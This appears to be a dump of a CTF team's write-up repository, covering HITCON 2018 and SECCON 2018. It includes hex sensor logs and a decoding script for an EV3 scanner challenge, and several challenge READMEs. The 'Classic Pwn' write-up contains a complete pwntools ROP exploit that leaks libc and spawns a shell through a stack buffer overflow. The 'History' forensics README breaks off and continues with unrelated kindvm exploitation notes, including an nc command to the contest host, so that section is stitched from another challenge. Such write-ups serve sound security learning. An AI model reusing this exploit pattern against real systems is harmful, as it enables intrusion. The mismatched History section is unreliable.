53 | 54 | ![](flag.png) 55 | 56 | Flag: **hitcon{EV3GYROSUCKS}** 57 | -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/ev3scanner-6b325d724565e51b3e2f8e59ff5ee6c9.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hitcon2018/ev3-scanner/ev3scanner-6b325d724565e51b3e2f8e59ff5ee6c9.tar.gz -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hitcon2018/ev3-scanner/flag.png -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line1.txt: -------------------------------------------------------------------------------- 1 | 07002a000200008040 2 | 07002a00020000c040 3 | 07002a00020000c040 4 | 07002a00020000803f 5 | 07002a000200000040 6 | 07002a00020000c040 7 | 07002a00020000c040 8 | 07002a00020000c040 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a00020000c040 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000c040 20 | 07002a00020000c040 21 | 07002a00020000c040 22 | 07002a00020000c040 23 | 07002a00020000c040 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a00020000c040 30 | 07002a00020000c040 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000c040 38 | 07002a00020000c040 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000c040 43 | 
-------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line10.txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line11.txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line12.txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line2.txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line3.txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line4.txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line5.txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line6.txt: --------------------------------------------------------------------------------
07002a00020000c040 169 | 07002a00020000c040 170 | 07002a00020000c040 171 | 07002a00020000803f 172 | 07002a00020000803f 173 | 07002a00020000c040 174 | 07002a00020000c040 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000c040 178 | 07002a00020000c040 179 | 07002a00020000c040 180 | 07002a00020000c040 181 | 07002a00020000803f 182 | 07002a000200008040 183 | 07002a00020000c040 184 | 07002a000200008040 185 | 07002a000200008040 186 | 07002a000200008040 187 | 07002a000200008040 188 | 07002a000200008040 189 | 07002a000200008040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line7.txt: -------------------------------------------------------------------------------- 1 | 07002a000200008040 2 | 07002a000200008040 3 | 07002a000200008040 4 | 07002a00020000c040 5 | 07002a00020000c040 6 | 07002a00020000803f 7 | 07002a000200000040 8 | 07002a00020000c040 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a00020000c040 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000c040 20 | 07002a00020000803f 21 | 07002a00020000803f 22 | 07002a00020000803f 23 | 07002a00020000803f 24 | 07002a00020000803f 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a00020000c040 30 | 07002a00020000c040 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000c040 38 | 07002a00020000c040 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000c040 43 | 07002a00020000c040 44 | 07002a00020000c040 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a00020000c040 49 | 07002a00020000c040 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000c040 53 | 
07002a00020000c040 54 | 07002a00020000803f 55 | 07002a000200000040 56 | 07002a00020000c040 57 | 07002a00020000c040 58 | 07002a00020000c040 59 | 07002a00020000c040 60 | 07002a00020000c040 61 | 07002a00020000803f 62 | 07002a00020000c040 63 | 07002a00020000c040 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a00020000c040 67 | 07002a00020000c040 68 | 07002a00020000c040 69 | 07002a00020000c040 70 | 07002a00020000c040 71 | 07002a000200008040 72 | 07002a00020000803f 73 | 07002a00020000c040 74 | 07002a00020000c040 75 | 07002a00020000c040 76 | 07002a00020000c040 77 | 07002a00020000c040 78 | 07002a00020000803f 79 | 07002a00020000803f 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a00020000c040 83 | 07002a00020000c040 84 | 07002a00020000c040 85 | 07002a00020000c040 86 | 07002a00020000c040 87 | 07002a00020000c040 88 | 07002a00020000c040 89 | 07002a00020000803f 90 | 07002a00020000c040 91 | 07002a00020000c040 92 | 07002a00020000c040 93 | 07002a00020000803f 94 | 07002a00020000c040 95 | 07002a00020000c040 96 | 07002a00020000c040 97 | 07002a00020000c040 98 | 07002a00020000c040 99 | 07002a00020000c040 100 | 07002a00020000c040 101 | 07002a00020000c040 102 | 07002a00020000c040 103 | 07002a00020000c040 104 | 07002a00020000c040 105 | 07002a00020000803f 106 | 07002a00020000c040 107 | 07002a00020000803f 108 | 07002a000200000040 109 | 07002a00020000c040 110 | 07002a00020000c040 111 | 07002a00020000c040 112 | 07002a00020000c040 113 | 07002a00020000803f 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000c040 117 | 07002a00020000c040 118 | 07002a000200004040 119 | 07002a000200000040 120 | 07002a00020000c040 121 | 07002a00020000c040 122 | 07002a000200008040 123 | 07002a00020000803f 124 | 07002a00020000c040 125 | 07002a00020000c040 126 | 07002a00020000c040 127 | 07002a00020000c040 128 | 07002a000200004040 129 | 07002a00020000803f 130 | 07002a00020000c040 131 | 07002a00020000c040 132 | 07002a00020000803f 133 | 07002a00020000c040 134 | 07002a00020000c040 
135 | 07002a00020000c040 136 | 07002a00020000c040 137 | 07002a00020000c040 138 | 07002a00020000c040 139 | 07002a00020000c040 140 | 07002a00020000c040 141 | 07002a00020000803f 142 | 07002a000200000040 143 | 07002a00020000c040 144 | 07002a00020000c040 145 | 07002a00020000c040 146 | 07002a00020000c040 147 | 07002a00020000803f 148 | 07002a00020000c040 149 | 07002a00020000c040 150 | 07002a00020000c040 151 | 07002a00020000803f 152 | 07002a000200008040 153 | 07002a00020000c040 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000c040 157 | 07002a00020000c040 158 | 07002a00020000c040 159 | 07002a00020000c040 160 | 07002a00020000803f 161 | 07002a000200008040 162 | 07002a00020000803f 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000c040 166 | 07002a00020000c040 167 | 07002a00020000c040 168 | 07002a00020000c040 169 | 07002a00020000803f 170 | 07002a00020000c040 171 | 07002a00020000c040 172 | 07002a00020000c040 173 | 07002a00020000c040 174 | 07002a00020000c040 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000c040 178 | 07002a00020000c040 179 | 07002a00020000c040 180 | 07002a00020000c040 181 | 07002a00020000803f 182 | 07002a00020000c040 183 | 07002a00020000c040 184 | 07002a00020000c040 185 | 07002a00020000c040 186 | 07002a00020000c040 187 | 07002a00020000c040 188 | 07002a00020000c040 189 | 07002a00020000c040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line8.txt: -------------------------------------------------------------------------------- 1 | 07002a00020000c040 2 | 07002a00020000c040 3 | 07002a00020000c040 4 | 07002a00020000c040 5 | 07002a00020000c040 6 | 07002a00020000803f 7 | 07002a00020000803f 8 | 07002a00020000803f 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000803f 16 | 07002a00020000803f 17 | 07002a00020000803f 18 | 07002a00020000803f 
19 | 07002a00020000803f 20 | 07002a00020000803f 21 | 07002a00020000c040 22 | 07002a00020000c040 23 | 07002a00020000c040 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000803f 28 | 07002a00020000803f 29 | 07002a00020000803f 30 | 07002a00020000c040 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a000200004040 38 | 07002a00020000803f 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000803f 43 | 07002a00020000c040 44 | 07002a00020000c040 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a000200008040 48 | 07002a00020000803f 49 | 07002a00020000c040 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000803f 53 | 07002a00020000803f 54 | 07002a00020000803f 55 | 07002a00020000803f 56 | 07002a00020000803f 57 | 07002a00020000803f 58 | 07002a00020000c040 59 | 07002a00020000c040 60 | 07002a000200004040 61 | 07002a000200000040 62 | 07002a00020000c040 63 | 07002a00020000c040 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a000200004040 67 | 07002a00020000803f 68 | 07002a00020000c040 69 | 07002a00020000c040 70 | 07002a00020000c040 71 | 07002a00020000803f 72 | 07002a00020000803f 73 | 07002a00020000803f 74 | 07002a00020000803f 75 | 07002a00020000803f 76 | 07002a00020000803f 77 | 07002a000200000040 78 | 07002a00020000c040 79 | 07002a00020000c040 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a000200008040 83 | 07002a00020000803f 84 | 07002a000200008040 85 | 07002a00020000c040 86 | 07002a00020000c040 87 | 07002a00020000c040 88 | 07002a00020000c040 89 | 07002a00020000c040 90 | 07002a00020000803f 91 | 07002a00020000803f 92 | 07002a00020000803f 93 | 07002a00020000c040 94 | 07002a00020000c040 95 | 07002a000200008040 96 | 07002a00020000803f 97 | 07002a00020000c040 98 | 07002a00020000c040 99 | 07002a00020000803f 100 | 07002a00020000803f 101 | 07002a00020000803f 102 | 
07002a00020000803f 103 | 07002a00020000803f 104 | 07002a00020000803f 105 | 07002a00020000803f 106 | 07002a00020000c040 107 | 07002a00020000c040 108 | 07002a00020000c040 109 | 07002a00020000c040 110 | 07002a000200004040 111 | 07002a00020000803f 112 | 07002a00020000c040 113 | 07002a00020000c040 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000803f 117 | 07002a00020000c040 118 | 07002a00020000c040 119 | 07002a00020000c040 120 | 07002a00020000c040 121 | 07002a00020000c040 122 | 07002a00020000803f 123 | 07002a00020000803f 124 | 07002a00020000803f 125 | 07002a00020000803f 126 | 07002a00020000803f 127 | 07002a00020000803f 128 | 07002a000200000040 129 | 07002a00020000c040 130 | 07002a00020000c040 131 | 07002a00020000c040 132 | 07002a00020000c040 133 | 07002a00020000c040 134 | 07002a00020000803f 135 | 07002a00020000803f 136 | 07002a00020000803f 137 | 07002a00020000c040 138 | 07002a00020000c040 139 | 07002a000200004040 140 | 07002a00020000803f 141 | 07002a000200000040 142 | 07002a000200004040 143 | 07002a00020000803f 144 | 07002a00020000803f 145 | 07002a00020000c040 146 | 07002a000200004040 147 | 07002a00020000803f 148 | 07002a00020000803f 149 | 07002a00020000803f 150 | 07002a00020000803f 151 | 07002a00020000803f 152 | 07002a00020000803f 153 | 07002a00020000c040 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000803f 157 | 07002a00020000803f 158 | 07002a00020000803f 159 | 07002a00020000803f 160 | 07002a00020000c040 161 | 07002a00020000c040 162 | 07002a00020000c040 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000c040 166 | 07002a00020000c040 167 | 07002a00020000803f 168 | 07002a00020000c040 169 | 07002a00020000c040 170 | 07002a00020000c040 171 | 07002a00020000c040 172 | 07002a000200004040 173 | 07002a00020000803f 174 | 07002a00020000c040 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000803f 178 | 07002a00020000803f 179 | 07002a00020000803f 180 | 07002a00020000803f 181 | 07002a00020000803f 182 | 
07002a00020000803f 183 | 07002a00020000803f 184 | 07002a00020000c040 185 | 07002a000200008040 186 | 07002a000200008040 187 | 07002a000200008040 188 | 07002a000200008040 189 | 07002a000200008040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line9.txt: -------------------------------------------------------------------------------- 1 | 07002a00020000c040 2 | 07002a000200008040 3 | 07002a000200008040 4 | 07002a00020000c040 5 | 07002a00020000c040 6 | 07002a00020000803f 7 | 07002a000200000040 8 | 07002a00020000c040 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000803f 12 | 07002a00020000803f 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a00020000803f 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000c040 20 | 07002a00020000c040 21 | 07002a00020000c040 22 | 07002a00020000803f 23 | 07002a00020000c040 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a00020000c040 30 | 07002a00020000803f 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000803f 38 | 07002a000200000040 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000803f 43 | 07002a00020000c040 44 | 07002a000200004040 45 | 07002a00020000803f 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a000200008040 49 | 07002a00020000803f 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000c040 53 | 07002a00020000c040 54 | 07002a00020000803f 55 | 07002a000200000040 56 | 07002a00020000c040 57 | 07002a00020000c040 58 | 07002a00020000c040 59 | 07002a00020000c040 60 | 07002a00020000c040 61 | 07002a00020000803f 62 | 07002a00020000c040 63 | 07002a00020000c040 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a00020000c040 67 | 07002a00020000c040 68 | 
07002a00020000c040 69 | 07002a00020000c040 70 | 07002a00020000c040 71 | 07002a00020000c040 72 | 07002a000200008040 73 | 07002a00020000803f 74 | 07002a00020000c040 75 | 07002a00020000c040 76 | 07002a00020000c040 77 | 07002a00020000803f 78 | 07002a000200008040 79 | 07002a00020000c040 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a00020000c040 83 | 07002a00020000c040 84 | 07002a00020000c040 85 | 07002a00020000c040 86 | 07002a00020000c040 87 | 07002a00020000c040 88 | 07002a00020000c040 89 | 07002a00020000803f 90 | 07002a000200000040 91 | 07002a00020000c040 92 | 07002a00020000c040 93 | 07002a00020000803f 94 | 07002a00020000c040 95 | 07002a00020000c040 96 | 07002a00020000c040 97 | 07002a00020000c040 98 | 07002a00020000c040 99 | 07002a00020000803f 100 | 07002a000200000040 101 | 07002a00020000c040 102 | 07002a00020000c040 103 | 07002a00020000c040 104 | 07002a00020000c040 105 | 07002a00020000c040 106 | 07002a00020000803f 107 | 07002a00020000c040 108 | 07002a00020000c040 109 | 07002a00020000c040 110 | 07002a00020000c040 111 | 07002a00020000c040 112 | 07002a00020000803f 113 | 07002a000200008040 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000803f 117 | 07002a00020000c040 118 | 07002a00020000c040 119 | 07002a00020000c040 120 | 07002a00020000c040 121 | 07002a00020000c040 122 | 07002a00020000803f 123 | 07002a00020000c040 124 | 07002a00020000c040 125 | 07002a00020000c040 126 | 07002a00020000c040 127 | 07002a00020000c040 128 | 07002a00020000803f 129 | 07002a00020000c040 130 | 07002a00020000c040 131 | 07002a00020000c040 132 | 07002a00020000c040 133 | 07002a00020000c040 134 | 07002a00020000c040 135 | 07002a00020000c040 136 | 07002a000200008040 137 | 07002a00020000803f 138 | 07002a00020000c040 139 | 07002a00020000c040 140 | 07002a000200004040 141 | 07002a00020000803f 142 | 07002a00020000c040 143 | 07002a00020000c040 144 | 07002a00020000c040 145 | 07002a00020000c040 146 | 07002a000200004040 147 | 07002a00020000803f 148 | 07002a00020000c040 149 | 
/hitcon2018/ev3-scanner/flag/solve.py:
--------------------------------------------------------------------------------
flag = []

# Each lineN.txt holds one 9-byte EV3 sensor record per line, as hex. The last
# four bytes are a little-endian float32 colour reading: 0000c040 = 6.0 (white
# in the EV3 colour sensor's colour mode), 0000803f = 1.0, 00000040 = 2.0, ...
for i in range(1, 13):
    temp = ''
    with open('line%d.txt' % i, 'rb') as fin:
        for line in fin:
            line = line.strip()
            if not line:
                continue
            num = int(line[-4:], 16)
            # 0xc040 (6.0) is the white background; any other colour is ink
            if abs(num - 0xc040) < 10:
                temp += ' '
            else:
                temp += '@'
    # the scanner sweeps alternate rows in the opposite direction
    if i % 2 == 0:
        temp = temp[::-1]
    flag.append(temp)

for line in flag:
    print(line)
--------------------------------------------------------------------------------
/seccon2018/GhostKingdom/README.md:
--------------------------------------------------------------------------------
# GhostKingdom
---
**Points:** 248 | **Solves:** 67/653 | **Category:** Web

http://ghostkingdom.pwn.seccon.jp/FLAG/

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO

--------------------------------------------------------------------------------
/seccon2018/README.md:
--------------------------------------------------------------------------------
# SECCON CTF 2018 Online Quals

https://ctftime.org/event/683

## Crypto
- [Boguscrypt (162)](boguscrypt)
- [mnemonic (260)](mnemonic)

## Forensics
- [Unzip (101)](unzip)
- [History (145)](history)

## Pwn
- [Classic Pwn (121)](classic-pwn)
- [kindvm (255)](kindvm)
- [Profile (255)](profile)

## QR
- [QR Checker (222)](qr-checker)

## Reversing
- [block (362)](block)
- [Runme (102)](runme)
- [shooter (434)](shooter)
- [Special Device File (231)](special-device-file)
- [Special Instructions (262)](special-instructions)
- [tctkToy (419)](tctktoy)

## Web
- [GhostKingdom (248)](GhostKingdom)
--------------------------------------------------------------------------------
/seccon2018/block/README.md:
--------------------------------------------------------------------------------
# Block
---
**Points:** 362 | **Solves:** 29/653 | **Category:** Reversing

BREAK THE BLOCK!

Hint: Real answer flag is not easy to get it, if your post flag is incorrect, it is not real one. Please try to analyze more.

[Download](block.apk_f2f0a7d6a3b3e940ca7cd5a3f7c5045eb57f92cf)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
From some recon we learned that the APK is built with Unity. We used [Unity Unpacker](http://devxdevelopment.com/UnityUnpacker) to analyze this APK and found this interesting asset.

![flag asset](block.png)

We tried to submit `SECCON{Y0U_4R3_34CH+3R?}` but failed.
My friend suggested that the word is *cheater* and tried to submit `SECCON{Y0U_4R3_CH34+3R?}`, but that failed again. Then I tried to fix the grammar, and we got the flag!

Flag: `SECCON{4R3_Y0U_CH34+3R?}`

## Bahasa Indonesia
We learned that the APK was built with Unity. We used [Unity Unpacker](http://devxdevelopment.com/UnityUnpacker) to analyze this APK and found an interesting asset.

![flag asset](block.png)

We tried to submit `SECCON{Y0U_4R3_34CH+3R?}` but failed. My friend suggested that the word is *cheater* and tried to submit `SECCON{Y0U_4R3_CH34+3R?}`, but that failed too. Then I fixed the grammar, and it turned out we got the flag!

Flag: `SECCON{4R3_Y0U_CH34+3R?}`

--------------------------------------------------------------------------------
/seccon2018/block/block.apk_f2f0a7d6a3b3e940ca7cd5a3f7c5045eb57f92cf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/block/block.apk_f2f0a7d6a3b3e940ca7cd5a3f7c5045eb57f92cf
--------------------------------------------------------------------------------
/seccon2018/block/block.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/block/block.png
--------------------------------------------------------------------------------
/seccon2018/boguscrypt/Boguscrypt.zip_3d8f4d6495e291543d48fcbdaccecf7127d16fae:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/boguscrypt/Boguscrypt.zip_3d8f4d6495e291543d48fcbdaccecf7127d16fae
--------------------------------------------------------------------------------
/seccon2018/boguscrypt/README.md:
--------------------------------------------------------------------------------
# Boguscrypt
---
**Points:** 162 | **Solves:** 125/653 | **Category:** Crypto

Boguscrypt

Hey, Can you decrypt the file?

[Download](Boguscrypt.zip_3d8f4d6495e291543d48fcbdaccecf7127d16fae)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO

--------------------------------------------------------------------------------
/seccon2018/classic-pwn/README.md:
--------------------------------------------------------------------------------
# Classic Pwn
---
**Points:** 121 | **Solves:** 197/653 | **Category:** Pwn

Host: classic.pwn.seccon.jp
Port: 17354

[Download](classic_aa9e979fd5c597526ef30c003bffee474b314e22)
[Download](libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
A classic binary exploitation challenge.
```
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
```

Below is the main function.
```
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-40h]

  puts("Classic Pwnable Challenge");
  printf("Local Buffer >> ", argv);
  gets(&v4);
  puts("Have a nice pwn!!");
  return 0;
}
```

The program calls `gets` into a 0x40-byte stack buffer with no canary, so the saved return address (rbp+0x8) can be overwritten.
Spawn a shell with ROP: on the first `gets`, leak libc and return to `main`; on the second `gets`, return into a one_gadget.
```
1st gets: pop rdi -> puts GOT/PLT -> function puts -> main
2nd gets: one_gadget
```

Below is the script.
```python
from pwn import *

# one_gadget offsets for the provided libc-2.23
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

r = remote('classic.pwn.seccon.jp', 17354)
libc = ELF('./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253')

# 1st gets: 0x48 bytes reach the saved return address, then
# pop rdi -> puts@GOT -> puts@PLT -> main
r.sendline(b'a' * 0x48 + p64(0x00400753) + p64(0x601018) + p64(0x400520) + p64(0x4006A9))
r.recvuntil(b'Local Buffer >> Have a nice pwn!!\n')

# puts prints the 6 significant bytes of its own address; pad to 8 for u64
libc_base = u64(r.recvline().strip() + b'\x00\x00') - libc.symbols.puts
print(hex(libc_base))

# 2nd gets: return straight into a one_gadget
r.sendline(b'a' * 0x48 + p64(libc_base + one[0]))
r.interactive()
```

## Bahasa Indonesia
A classic binary exploitation challenge.
```
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
```

Below is the main function.
```
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-40h]

  puts("Classic Pwnable Challenge");
  printf("Local Buffer >> ", argv);
  gets(&v4);
  puts("Have a nice pwn!!");
  return 0;
}
```

The program calls gets without a canary.
Spawn a shell with ROP by overwriting the return address (rbp+0x8): leak libc -> back to main.
On the second gets, call one_gadget.
```
1st gets: pop rdi -> puts GOT/PLT -> function puts -> main
2nd gets: one_gadget
```

Below is the script used.
```python
from pwn import *

# one_gadget offsets for the provided libc-2.23
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

r = remote('classic.pwn.seccon.jp', 17354)
libc = ELF('./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253')

# 1st gets: 0x48 bytes reach the saved return address, then
# pop rdi -> puts@GOT -> puts@PLT -> main
r.sendline(b'a' * 0x48 + p64(0x00400753) + p64(0x601018) + p64(0x400520) + p64(0x4006A9))
r.recvuntil(b'Local Buffer >> Have a nice pwn!!\n')

# puts prints the 6 significant bytes of its own address; pad to 8 for u64
libc_base = u64(r.recvline().strip() + b'\x00\x00') - libc.symbols.puts
print(hex(libc_base))

# 2nd gets: return straight into a one_gadget
r.sendline(b'a' * 0x48 + p64(libc_base + one[0]))
r.interactive()
```
--------------------------------------------------------------------------------
/seccon2018/classic-pwn/classic_aa9e979fd5c597526ef30c003bffee474b314e22:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/classic-pwn/classic_aa9e979fd5c597526ef30c003bffee474b314e22
--------------------------------------------------------------------------------
/seccon2018/classic-pwn/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/classic-pwn/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253
--------------------------------------------------------------------------------
/seccon2018/history/J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/history/J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba
--------------------------------------------------------------------------------
/seccon2018/history/README.md:
--------------------------------------------------------------------------------
# History
---
**Points:** 145 | **Solves:** 147/653 | **Category:** Forensics

History Check changed filename.
file:J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba

[Download](J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
If we open the file `J` in a hex editor, we see what looks like UTF-16LE text. We can read the strings with the `strings` utility by giving it the proper 16-bit encoding.

```
$ strings --encoding={b,l} J
```

[...]

```
0 -> insn_nop;
1 -> insn_load;
2 -> insn_store;
3 -> insn_mov;
4 -> insn_add;
5 -> insn_sub;
6 -> insn_halt;
7 -> insn_in;
8 -> insn_out;
9 -> insn_hint;
```

Wait, the binary uses `gets` for the name input!
Let's exploit it!
```cpp
char *input_username()
{
  char *dest; // ST18_4
  size_t v1; // eax
  char s; // [esp+12h] [ebp-16h]
  unsigned int v4; // [esp+1Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  printf("Input your name : ");
  gets(&s);
  dest = (char *)malloc(0xAu);
  v1 = strlen(&s);
  dest[9] = 0;
  strncpy(dest, &s, v1);
  return dest;
}
```

Well.
```
Input your name : aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[ASCII-art banner: "Hint1 GET!"]

Nice try! The theme of this binary is not Stack-Based BOF!
However, your name is not meaningless...
```

Okay, moving on. Let's just call instruction 9 (hint).
```
asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x09\n' | nc kindvm.pwn.seccon.jp 12345
Input your name : Input instruction : [ASCII-art banner: "kindvm"]

Instruction start!
[ASCII-art banner: "Hint2 GET!"]

Nice try! You can analyze vm instruction and execute it!
Flag file name is "flag.txt".
```

Sure!
We also see a third hint in the binary (insn_add).
```
_DWORD *insn_add()
{
  _DWORD *result; // eax
  unsigned __int8 v1; // [esp+Ah] [ebp-Eh]
  unsigned __int8 v2; // [esp+Bh] [ebp-Dh]
  signed int v3; // [esp+Ch] [ebp-Ch]

  v1 = load_insn_uint8_t();
  v2 = load_insn_uint8_t();
  if ( v1 > 7u )
    kindvm_abort();
  if ( v2 > 7u )
    kindvm_abort();
  if ( *((_DWORD *)reg + v1) >= 0 )
    v3 = 1;
  result = (char *)reg + 4 * v1;
  *result += *((_DWORD *)reg + v2);
  if ( v3 )
  {
    result = (_DWORD *)*((_DWORD *)reg + v1);
    if ( (signed int)result < 0 )
      hint3();
  }
  return result;
}
```

It requires the register `reg[v1]` to end up with a negative value after the add. Let's try to load one with the `in` (7) instruction.
